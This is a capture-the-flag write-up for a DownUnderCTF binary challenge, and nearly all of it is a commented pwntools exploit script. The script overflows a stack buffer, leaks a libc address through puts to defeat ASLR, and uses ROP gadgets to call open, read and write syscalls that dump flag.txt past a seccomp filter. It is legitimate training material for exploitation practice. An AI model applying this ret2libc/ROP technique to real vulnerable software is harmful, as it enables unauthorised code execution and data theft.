Tags: ret2libc bufferoverflow seccomp orw 

Rating:

Return2Libc + ORW

```python
#!/usr/bin/python

from pwn import *

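# pwntools setup: linux/amd64 target. 'DEBUG' dumps every byte sent/received,
# which is what you want while validating the chain offsets.
# NOTE: the pwntools setting is spelled `log_level`; the original
# `context.loglevel` is not a real setting (depending on the pwntools
# version it is either rejected or silently ignored).
context(os='linux', arch='amd64')
context.log_level = 'DEBUG'
context(terminal=['tmux', 'new-window'])

# Target selection: local process / local under gdb / the remote challenge host.
# p = process('./return-to-whats-revenge')
# p = gdb.debug('./return-to-whats-revenge', 'b main')
p = remote('chal.duc.tf', 30006)
e = ELF('./return-to-whats-revenge')
libc = ELF('./libc.so.6')  # the libc shipped with the challenge; every offset below depends on it

# Padding from the start of the overflowed buffer up to the saved return
# address (0x38 bytes, as found by the writeup author -- re-verify against
# the binary if the chain does not land).
JUNK = b"A" * 56

# Stage-1 gadgets come from the binary itself, used at its link address
# (i.e. no PIE), so no leak is needed yet.
gets = e.plt['gets']
main = e.symbols['main']
pltputs = e.plt['puts']
gotputs = e.got['puts']
poprdi = next(e.search(asm('pop rdi; ret')))
# Scratch area in .bss for the filename and, later, the flag contents. The
# +1200 keeps it clear of whatever stdio/libc state sits at the start of .bss.
bss = e.getsectionbyname('.bss')["sh_addr"] + 1200

# Stage 1: gets(bss) to plant the filename, puts(got['puts']) to leak libc,
# then return to main so we get a second overflow.
payload = JUNK
payload += p64(poprdi) + p64(bss) + p64(gets)
payload += p64(poprdi) + p64(gotputs) + p64(pltputs)
payload += p64(main)

p.recvuntil(b"to?\n")
p.sendline(payload)
# Consumed by the gets(bss) call in the chain. gets() NUL-terminates the
# string in place, which is exactly what open(2) needs in stage 2.
p.sendline(b"flag.txt")

# puts() writes the 6 significant bytes of the pointer followed by "\n".
# Read exactly those 6 bytes: the original `recvline().strip()` silently
# drops a leading/trailing address byte that happens to be whitespace
# (0x09-0x0d, 0x20) and stops early if any address byte is 0x0a.
leak = u64(p.recvn(6).ljust(8, b"\x00"))
print(hex(leak))

# Rebase libc from the leaked puts address and locate the syscall gadgets.
libcputs = libc.symbols['puts']
lba = leak - libcputs
syscall = next(libc.search(asm('syscall; ret'))) + lba
poprsi = next(libc.search(asm('pop rsi; ret'))) + lba
poprdx = next(libc.search(asm('pop rdx; ret'))) + lba  # not every glibc build has a bare one
poprax = next(libc.search(asm('pop rax; ret'))) + lba

# Stage 2: open/read/write the flag with raw syscalls. The challenge tags
# mention seccomp, which is why this avoids system()/execve and only uses
# open(2)/read(2)/write(2) (x86-64 syscall numbers 2/0/1).
payload = JUNK
# open(bss, O_RDONLY): rdx (mode) is irrelevant for O_RDONLY, so it is left alone.
payload += p64(poprax) + p64(2)
payload += p64(poprdi) + p64(bss)
payload += p64(poprsi) + p64(0)
payload += p64(syscall)
# read(3, bss, 50): assumes open() returned fd 3, i.e. only 0/1/2 were open
# before it. A flag longer than 50 bytes would be truncated here.
payload += p64(poprax) + p64(0)
payload += p64(poprdi) + p64(3)
payload += p64(poprsi) + p64(bss)
payload += p64(poprdx) + p64(50)
payload += p64(syscall)
# write(1, bss, 50): rsi still holds bss because the syscall instruction
# only clobbers rax, rcx and r11.
payload += p64(poprax) + p64(1)
payload += p64(poprdi) + p64(1)
payload += p64(poprdx) + p64(50)
payload += p64(syscall)
# No exit gadget follows, so the process crashes after the write. That is
# fine: write(1, ...) is a raw syscall, the bytes are already on the wire.

p.recvuntil(b"to?\n")
p.sendline(payload)
print(p.recvline())

p.close()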
```